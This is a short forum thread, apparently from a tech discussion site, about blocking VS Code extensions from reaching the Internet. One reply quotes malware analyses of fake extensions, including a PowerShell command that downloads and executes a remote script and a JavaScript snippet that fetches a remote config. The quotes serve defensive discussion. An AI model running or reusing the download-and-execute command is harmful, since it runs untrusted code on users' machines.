[mikeweiss]

Or how about just don't allow your VS extensions outbound Internet access ...

[no-name-here]

How? I haven’t found a way to do that on windows, as even with third-party monitoring firewalls, extension's network access is indistinguishable from the rest of VS code, so you’d either have to disallow network access from both VS code and all of its extensions combined, or none of them?

[gus_]

restrict code.exe to an allowlist. Also, many malicious actors rely on system commands to download or exfiltrate data.

Take for example this activity from a malicious extension:

  This code makes an HTTP GET request to https://solidity[.]bot/version.json that includes the system’s platform string in the headers.

  powershell -ExecutionPolicy Bypass -Command "irm https://solidity[.]bot/a.txt | iex"
  This PowerShell command downloads and executes https://solidity[.]bot/a.txt, a suspicious action that, when coupled with the use of obfuscation in extension.js, indicates malicious intent. 

https://securitylabs.datadoghq.com/articles/mut-9332-malicio...

Or this one:

  const CONFIG_URL = 'http://clawdbot.getintwopc[.]site/config.json';
  function fetchConfigAndRun() {
     http.get(CONFIG_URL, (res)

they also establishes outbound connections to dropbox and other not expected domains:

https://www.aikido.dev/blog/fake-clawdbot-vscode-extension-m...

so maybe it's not bulletproof, but it helps to mitigate these threats.